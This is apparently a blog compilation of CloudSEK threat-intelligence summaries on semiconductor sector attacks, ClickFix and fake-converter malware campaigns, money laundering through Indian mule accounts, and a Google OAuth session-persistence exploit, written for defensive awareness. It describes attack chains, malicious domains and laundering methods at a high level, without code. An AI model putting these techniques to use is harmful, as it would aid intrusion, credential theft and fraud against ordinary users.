The IT Nerd

CloudSEK’s latest threat intelligence report, Silicon Under Siege: The Cyber War Reshaping the Global Semiconductor Industry, uncovers a rapidly escalating cyber threat landscape targeting the semiconductor sector – the digital backbone of modern civilization.

Powering everything from AI and defence systems to smartphones, clean energy, and healthcare, semiconductors have become both a strategic asset and a prime cyber target. The research reveals that nation-state-backed groups, ransomware operators, and hacktivists are waging a silent but highly coordinated cyber war — one that threatens economies, disrupts global supply chains, and risks the very foundation of critical infrastructure.

CloudSEK’s proof-of-concept showed how AI can be harnessed to design and embed hardware Trojans at the pre-design stage of a chip. Even a simple AI-generated implant can evade detection and, once manufactured, lie dormant for years until triggered – leaking sensitive data, falsifying outputs, or halting operations. More advanced AI-driven designs could tailor Trojans to bypass specific security checks, adapt to different architectures, and remain invisible across multiple verification stages, making them potent tools for espionage or sabotage in the semiconductor supply chain.

Key Findings from the CloudSEK Report

• Attack volume up sixfold since 2022 — Driven by espionage, supply-chain compromises, and state-sponsored campaigns.
• $1.05 billion in ransomware-related losses since 2018 — Including ransom payments, downtime, and recovery costs, crippling semiconductor operations worldwide.
• IT as initial attack vector — Over 60% of ICS breaches begin with IT (phishing, VPN exploits, CVEs, exposed interfaces and misconfigurations, default or leaked/compromised credentials, etc.) before pivoting to OT.
• Massive infrastructure exposure — The U.S. alone has ~2 million publicly reachable ICS assets linked to semiconductor operations, many potentially with weak or default controls.
• Massive Middle East ICS exposure — Across the Middle East, publicly reachable ICS & OT assets tied to semiconductor-linked manufacturing and potentially critical oil, gas, and industrial operations remain exposed: UAE (~12.1K), Turkey (~10.8K), Saudi Arabia (~4.8K), Iran (~4.6K), Bahrain (~2.4K), and Qatar (~400), with potential vulnerabilities stemming from weak authentication, misconfigurations, and outdated protocols.
• High-value espionage incidents — In July 2025, China-backed APT41 infiltrated multiple Taiwanese semiconductor companies via a compromised software update, stealing proprietary chip designs and process data.
• Pre-silicon hardware Trojans — CloudSEK’s proof-of-concept AI-generated Trojan can remain dormant until triggered, leaking cryptographic keys while evading standard tests.
• Single vendor compromise cascading into global disruption — The 2023 MKS Instruments ransomware breach caused an estimated $250M in losses to Applied Materials in one quarter. 
   

Geopolitics and the “Silicon Cold War”

The semiconductor race has become a strategic flashpoint in the global balance of power, with cyber espionage campaigns, supply chain intrusions, and state-backed sabotage now central to the contest:

• China — investing $150+ billion to achieve chip self-sufficiency and reduce reliance on Western tech.
• U.S. — committed $52 billion via the CHIPS Act to reshore manufacturing and secure supply chains.
• India — investing $10 billion in its semiconductor mission, aiming for a $100 billion market by 2030.
• Taiwan — produces over 60% of the world’s advanced chips, making it a critical node in the global tech ecosystem.
• Europe — facing converging geopolitical and infrastructure risks, as exemplified by a SCADA compromise of a Ukrainian power substation during the Russia–Ukraine conflict that used OT-aware malware to issue malicious control commands.

State-sponsored Advanced Persistent Threats (APTs) such as APT41, Volt Typhoon, PlushDaemon, etc. are embedding themselves in software pipelines, EDA tools, and factory operations, shifting from mere data theft to long-term disruption strategies that can cripple production during geopolitical flashpoints.

Notable Campaigns and Case Studies

Historic Incidents

The semiconductor industry’s cyber risk is not new. Landmark events such as the 2010 Stuxnet sabotage of Iran’s Natanz facility, the 2018 TSMC WannaCry infection that halted iPhone chip production, and other high-profile attacks have long demonstrated the destructive potential of cyber threats to semiconductor-driven critical infrastructure.

Real-World Incidents Highlighting IT–OT Interdependencies

• Aliquippa Water Authority Breach (Nov 2023) — Default HMI credentials exposed Unitronics PLCs, demonstrating how simple IT misconfigurations can compromise industrial controls.
• UNC5221 VPN Exploitation (2025) — State-affiliated actors exploited CVE-2025-22457 in ICS VPN appliances to pivot into OT networks, spotlighting VPNs as critical OT entry points.
• Infostealer Malware Targeting Defense Contractors (Feb 2025) — Commodity stealers harvested credentials that could be used to access corporate VPNs and OT management interfaces.
• Medusa Ransomware Campaigns (2021–2025) — Active RaaS operations targeting legacy ICS/SCADA systems in manufacturing and supply chains, often combining encryption with IP extortion.
• Microchip Technology Breach (Aug 2024) — IT system compromise disrupted multiple facilities, causing ~$21M in losses and halting connected OT functions.
   

Emerging Threat Patterns Identified by CloudSEK

• Supply Chain Attacks — Targeting trusted vendors, software updates, and outsourced design services.
• Pre-silicon Design Compromise — Embedding hardware Trojans directly into chip designs during the design phase, remaining dormant and undetectable until after manufacturing.
• IT–OT Convergence Risks — Misconfigured SCADA dashboards, HMIs, and cleanroom controllers now searchable online, enabling attackers to “log in” rather than hack in.
• Ransomware with IP Extortion — Exfiltrating proprietary designs to pressure payments from both chipmakers and dependent industries.

CloudSEK’s Strategic Recommendations for the Semiconductor Sector

1. Isolate IT and OT Networks — Prevent lateral movement between corporate IT and manufacturing systems.
2. Secure-by-Design Practices — Implement RTL integrity checks, formal logic verification, and traceable SBOMs for third-party IP.
3. Continuous Attack Surface Monitoring — Detect exposed assets, leaked credentials, and unpatched CVEs before attackers exploit them.
4. Vendor Risk Management — Enforce stringent security requirements for all suppliers and third-party service providers.
5. Global Threat Intelligence Sharing — Collaborate across borders to detect and neutralize state-sponsored campaigns before they escalate.

CloudSEK’s BeVigil and XVigil platforms deliver real-time visibility into exposed IT/OT assets on the Internet, map vulnerable vendor ecosystems, and track emerging threat actor infrastructure, enabling chipmakers and suppliers to act before vulnerabilities become permanent features of the global tech landscape.

Full report available here: https://www.cloudsek.com/whitepapers-reports/silicon-under-siege-the-cyber-war-reshaping-the-global-semiconductor-industry  

CloudSEK’s latest threat intelligence report reveals a sophisticated ransomware campaign leveraging fake ClickFix-themed verification pages to distribute Epsilon Red malware.

Threat actors are impersonating platforms like Discord, Twitch, and OnlyFans to trick users into downloading .HTA files. These payloads silently execute ransomware via browser-based ActiveX abuse—bypassing standard security measures and putting global users at risk.

Key Highlights:

• Active campaign observed in July 2025
• Abuse of social engineering and brand impersonation
• Infrastructure linked to multiple fake domains and IPs
• Epsilon Red ransom notes bear stylistic resemblance to REvil, though the malware is distinct
• Final-stage deployment of Epsilon Red ransomware
   

Full report available here:
🔗 https://www.cloudsek.com/blog/threat-actors-lure-victims-into-downloading-hta-files-using-clickfix-to-spread-epsilon-red-ransomware

CloudSEK has released a groundbreaking whitepaper uncovering a sophisticated network of Chinese-operated illegal payment gateways exploiting India’s digital banking infrastructure. 

The report, titled Chinese-Operated Illegal Payment Gateways Exploiting & Laundering in the Indian Financial Network, reveals how transnational criminal syndicates are orchestrating a multi-billion-dollar shadow economy, laundering funds through illicit gateways that facilitate illegal gambling, Ponzi schemes, predatory lending, and digital fraud.

A Parallel Financial Ecosystem Threatening India’s Economy

India’s rapid digital transformation, powered by the Unified Payments Interface (UPI), has revolutionized financial access but also created vulnerabilities. CloudSEK’s research exposes how Chinese-led syndicates are exploiting these gaps, operating illegal payment gateways that bypass Reserve Bank of India (RBI) regulations. 

These gateways serve as the financial backbone for illicit operations, facilitating the movement of tainted money through a web of “mule” bank accounts to obscure its origins before exfiltrating it via cryptocurrency or hawala networks. (For More Information, Download Full Report)

Key findings include:

• Massive Scale of Operations: A single fraudulent app analyzed by CloudSEK facilitated ₹166 crore in transactions across 398,675 transactions, involving 34,299 unique mule accounts in just 12 months. Extrapolating to an estimated 25 similar apps, the total laundered amount could reach ₹4,000–5,000 crore annually, with a daily volume of ₹10–15 crore.
• Sophisticated Mule Recruitment: Criminals target vulnerable Indians—unemployed youth, students, and rural communities—through fraudulent apps, face-to-face agents, and “work-from-home” OTP-sharing scams to harvest bank accounts. These accounts are then integrated into advanced dashboards for large-scale money laundering.
• Global Reach, Local Impact: 40+ countries involved in the illegal payment gateway network. The syndicates operate from Southeast Asia and the Mekong region, using mule accounts from India, Pakistan, Bangladesh, and beyond. Funds are laundered through dynamic UPI IDs, cryptocurrency (primarily USDT-Tether), and fake international trade, draining India’s economy and evading taxes.
• Diverse Illicit Clients: The gateways serve illegal gambling platforms (e.g., Aviator crash games), Ponzi schemes, predatory lending apps, fake stock trading platforms, and digital arrest scams, charging transaction fees of 3–10% based on the risk level of the funds.
• Tech-Enabled Deception: Over 100 Telegram channels promote these gateways, while YouTube tutorials with 37,200+ views guide fraudsters on integrating APIs. Shell companies pose as legitimate fintechs, using paid ads on Google, Facebook, and Instagram to whitewash their operations. (For More Information, Download Full Report)

Three-Tier Exploitation Model Uncovered

CloudSEK’s research identified three distinct categories of illegal payment gateway clients, each charged different fees based on risk levels:

1. Gaming & Gambling Platforms (5% deposit, 3% withdrawal fees) – Including illegal casinos and betting apps like crash games
2. Ponzi & Investment Schemes (7-8% deposit, 4-5% withdrawal fees) – Fake investment platforms promising unrealistic returns
3. Mixed Scam Operations (10% deposit, 10% withdrawal fees) – Multi-source fraud including loan scams and crypto doubling schemes

The syndicates employ multiple recruitment strategies to acquire Indian bank accounts, including fraudulent mobile applications that request banking credentials and intercept OTP messages, face-to-face agents who target vulnerable populations with cash payments, and “work-from-home” schemes where individuals unknowingly serve as human OTP relays.

Technical Sophistication Rivals Legitimate Services

The illegal gateways operate with remarkable technical sophistication, featuring dynamic UPI infrastructure that generates unique QR codes for each transaction, full API integration allowing automated fund collection, global wallet access enabling multi-currency transactions, and comprehensive monitoring dashboards for real-time transaction management.

Once funds are collected, they undergo a complex layering process across 7-10 different mule accounts within minutes, making detection and tracing extremely difficult. The final stage involves exfiltrating laundered funds from India through cryptocurrency purchases, traditional hawala networks, or trade-based money laundering schemes.

Real-World Consequences for India

The implications of these findings are profound:

• Economic Drain: The shadow economy siphons billions of rupees annually, weakening the Indian Rupee and depriving the government of tax revenue.
• Financial System Integrity: The volume of fraudulent transactions overwhelms bank fraud detection systems, eroding public trust in digital payments.
• Social Harm: Indian citizens are doubly victimized—first as targets of scams and then as unwitting money mules facing frozen accounts or legal repercussions.
• National Security Risks: The infrastructure could fund activities against India’s interests, while massive data collection by fraudulent apps poses espionage risks.

Law enforcement actions validate CloudSEK’s findings: 

• Hyderabad Police (2022): Uncovered ₹700+ crore money laundering operation with Chinese nationals operating from Dubai
• Enforcement Directorate (2022-2023): Froze hundreds of crores across multiple investigations into predatory loan and gambling apps
• Odisha EOW (2023): Revealed over 1,000 mule accounts used to launder ₹1,000+ crore from cyber-scams

The shadow banking system poses significant threats to India’s economic sovereignty, financial system integrity, and national security while victimizing countless citizens who become unwitting money mules.

We have already reported a total of ~47,000 mule accounts to both Public and Private sector banks since we began extracting and analyzing data from illicit mobile applications. These accounts collectively represent a transaction volume of around ₹250 crore. (For More Information, Download Full Report)

A Call to Action

CloudSEK urges immediate, coordinated action to dismantle these networks:

• Banks and Fintechs: Deploy AI-powered monitoring to detect mule account patterns and strengthen KYC for corporate accounts.
• Regulators: Enforce stricter fintech oversight and issue clear guidelines on mule account liability.
• Law Enforcement: Build specialized cyber-financial crime units and pursue international cooperation to target syndicate leaders.
• Tech Platforms: Enhance app vetting on Google and Apple stores to block fraudulent apps.
• Public Awareness: Launch nationwide campaigns to educate citizens about the risks of sharing OTPs or “renting” bank accounts, emphasizing that acting as a money mule is a serious crime.

CloudSEK’s Commitment to Cybersecurity

“These illegal payment gateways are not just financial crimes; they’re a direct attack on India’s digital economy and citizen trust, Our research arms stakeholders with actionable intelligence to disrupt these networks and protect India’s financial sovereignty,” said Mayank Sahariya, Cyber Threat Analyst at CloudSEK.

“Financial institutions, regulators, and law enforcement agencies must move beyond reactive measures to proactive, intelligence-driven strategies. The window for action is narrowing as these networks continue to expand and sophisticate their operations,” Mayank Sahariya added.

CloudSEK continues to monitor these criminal networks and provide actionable intelligence to help financial institutions, regulators, and law enforcement agencies protect India’s digital economy and financial sovereignty.

CloudSEK has raised $19 million across its Series A2 and B1 funding rounds. The round included participation from a mix of India- and US-based investors, such as MassMutual Ventures, Inflexor Ventures, Prana Ventures, Tenacity Ventures, and select strategic investors, including Commvault. Notably, Meeran Family (founders of Eastern Group), StartupXSeed, Neon Fund and Exfinity Ventures are among CloudSEK’s earlier backers and continue to support the company’s long-term vision.

Founded in 2015 by cybersecurity researcher-turned-entrepreneur Rahul Sasi, CloudSEK was created with a mission to build a safer digital future by proactively predicting and mitigating cyber threats. What began as a research-driven initiative has since evolved into one of the industry’s most trusted threat intelligence platforms—serving 250+ enterprises across banking, healthcare, technology, and the public sector.

The newly raised capital will fuel CloudSEK’s continued product innovation and global expansion, with a focus on advancing its AI models and platform integrations. Unlike traditional tools that respond after an incident, CloudSEK identifies Initial Attack Vectors (IAVs)—the earliest signs of a potential breach, such as leaked credentials, exposed APIs, or compromised vendors.

CloudSEK’s differentiated approach has resonated globally, earning the company a 4.8-star rating on Gartner Peer Insights across 195 reviews, making it one of the most recommended vendors in the cybersecurity space.

With this funding and a strategic investor on board, CloudSEK is doubling down on its vision to make predictive threat intelligence a global cybersecurity standard for —empowering organizations to stay ahead of increasingly sophisticated threat actors.

CloudSEK’s security researchers have uncovered a sophisticated malware campaign using fake PDF-to-DOCX conversion tools to infect unsuspecting users with a powerful information stealer. This comes just weeks after the FBI’s Denver office issued a public alert warning of malicious online file converters being leveraged to deliver malware.

The report reveals how cybercriminals have crafted deceptive websites, such as candyxpdf[.]com and candyconverterpdf[.]com, that meticulously mimic the legitimate pdfcandy.com service. 

These fraudulent platforms lure users into executing a malicious PowerShell command, initiating a complex infection chain that delivers malware capable of stealing sensitive data, including browser credentials, cryptocurrency wallets, and other personal information. 

A Sophisticated Blend of Deception and Technology

The campaign employs advanced social engineering to exploit users’ trust. Victims uploading a PDF for conversion encounter a fake processing animation, followed by an unexpected CAPTCHA prompt designed to enhance the site’s perceived legitimacy and rush users into action. This leads to instructions to run a PowerShell command, which triggers a redirection chain through domains like bind-new-connect[.]click, ultimately delivering a malicious “adobe.zip” payload. The archive contains “audiobit[.]exe,” which leverages legitimate Windows tools like MSBuild[.]exe to deploy Arechclient2. (Read Full Report, For More Information)

“This campaign highlights how cybercriminals exploit everyday digital tools. By combining psychological manipulation with technical sophistication, these attackers turn routine tasks like file conversion into opportunities for data theft. Our research aims to equip individuals and organizations with the knowledge to stay safe,” said Varun Ajmera, Threat Intelligence Researcher, CloudSEK.

The scale of this threat becomes clear when considering the popularity of the legitimate PDFCandy.com, which attracts approximately 2.8 million monthly visits. Notably, India represents the largest segment of its user base, accounting for 19.07% or roughly 533,960 monthly visitors. This substantial audience provides a vast pool of potential victims for the threat actors behind this malicious campaign. While the fraudulent sites, candyxpdf[.]com and candyconverterpdf[.]com, saw approximately 2,300 and 4,100 visits respectively in March 2025, these numbers demonstrate active exploitation of the impersonated service’s popularity.

How the Attack Works

• Spoofed Websites: Domains like candyxpdf[.]com and candyconverterpdf[.]com imitate the real PDFCandy website.
   
• Deceptive Flow: Fake file conversion followed by a CAPTCHA prompt creates trust and urgency.
   
• Malware Trigger: Users are prompted to run a PowerShell command, leading to the download of a malicious ZIP file masquerading as a legitimate Adobe resource.
   
• Payload Execution: The ZIP contains audiobit.exe, which executes via MSBuild.exe – a legitimate Windows utility weaponized to run ArechClient2. (Read Full Report, For More Information)
   

CloudSEK’s technical analysis traced the malware delivery chain through multiple redirections, eventually landing on a known malicious domain (bind-new-connect[.]click) to deliver the payload. The attacker’s infrastructure, command chain, and payload hashes are included in the full report.

Wider Implications

This campaign demonstrates a growing trend where attackers prey on routine digital activities—like file conversion—to compromise systems. Given the increasing use of online converters in corporate and personal workflows, this type of attack has wide-ranging implications for cybersecurity hygiene.

Protecting Against the Threat

CloudSEK’s report provides actionable recommendations to safeguard individuals and organizations:

• Stick to Trusted Tools: Use reputable file conversion services from official websites and avoid unverified “free” converters.
• Strengthen Technical Defenses: Keep antivirus software updated, deploy endpoint detection and response (EDR) solutions, and use DNS filtering to block malicious domains.
• Educate Users: Train employees to recognize red flags, such as suspicious URLs, unexpected CAPTCHAs, or prompts to run command-line instructions.
• Incident Response: Isolate compromised devices, change passwords from a clean device, and report incidents to authorities promptly.
• Offline Alternatives: Consider offline conversion tools to avoid uploading sensitive files to remote servers.

A Call to Vigilance

As online file converters remain a staple in digital workflows, this campaign underscores the need for heightened awareness. “As threat actors become more creative with their tactics, cybersecurity must evolve to prioritize behavior-based detection, user awareness, and zero-trust principles. Organizations should invest in robust endpoint security, DNS filtering, and employee training. Most importantly, we need to reduce reliance on unknown web-based tools and encourage the use of secure, offline alternatives for tasks like file conversion,” said Varun Ajmera, Threat Intelligence Researcher, CloudSEK.

About CloudSEK: CloudSEK is a contextual AI company that predicts Cyber Threats. Our Cloud SaaS platform constantly seeks security solutions for our customers’ digital risks.
To learn more about how CloudSEK can strengthen your external security posture and deliver value from Day One, visit https://cloudsek.com or drop a note to info@cloudsek.com. 

Attackers are exploiting undocumented Google OAuth2 functionality to hijack user sessions. The approach gives them continuous access to Google services, even after a password reset.

Researcher Pavan Karthick M at CloudSEK has detailed how the threat actor called “Prisma” was the first to use a critical OAuth exploit which “allows the generation of persistent Google cookies through token manipulation.”

OAuth 2.0 is a protocol utilized by Google APIs for authentication and authorization, such as enabling “Log in with Google” across the web. It allows users to grant specific data access to applications while safeguarding sensitive information like passwords.

The exploit has two key features:

• Session Persistence: The session remains valid even when the account password is changed, providing a unique advantage in bypassing typical security measures.
• Cookie Generation: The capability to generate valid cookies in the event of a session disruption enhances the attacker’s ability to maintain unauthorized access.

2023 Adoption Timeline:

Oct 20:    The exploit is first revealed on a Telegram channel.
Nov 14:    Lumma announces the feature’s integration with an advanced blackboxing approach. The feature started Booming because of the Security Field posting about Lumma’s unique feature.
Nov 17:    Rhadamanthys announces the feature with similar blackboxing approach as Lumma
Nov 24:    Lumma updates the exploit to counteract Google’s fraud detection measures.
Dec 1:    Stealc implements the google account token restore feature
Dec 11:    Meduza implements the google account token restore
Dec 12: RisePro Implements the google account token restore feature
Dec 26:    WhiteSnake implemented the google account token restore
Dec 27: Hudson Rock posts video from Darkweb where a hacker shows exploiting the generated cookies.

“This analysis… highlights the necessity for continuous monitoring of both technical vulnerabilities and human intelligence sources to stay ahead of emerging cyber threats. The collaboration of technical and human intelligence is crucial in uncovering and understanding sophisticated exploits like the one analyzed in this report,” Karthick M concludes.

Troy Batterberry, CEO and Founder, EchoMark had this to say:

   “As we navigate the evolving landscape of cybersecurity, the sophistication of threat actors is on the rise, leading to a potential surge in zero-day exploits in 2024. Lumma’s recent assault is a poignant example. The adept concealment of their proprietary attack mechanism and exploit methodologies, coupled with their ability to circumvent detection and sustain persistent access despite routine security measures, underscores the imperative for individuals and businesses alike to heed this wake-up call. Organizations operate on trust and secure data sharing and must prioritize proactive security measures and continuous monitoring to effectively combat the ever-emerging challenges posed by cyber threats.”

This proves that to everyone needs to work hard to stay level with threat actors at the very least. Because threat actors are always looking for new angles to launch new attacks. Which will end badly for all of us if they succeed.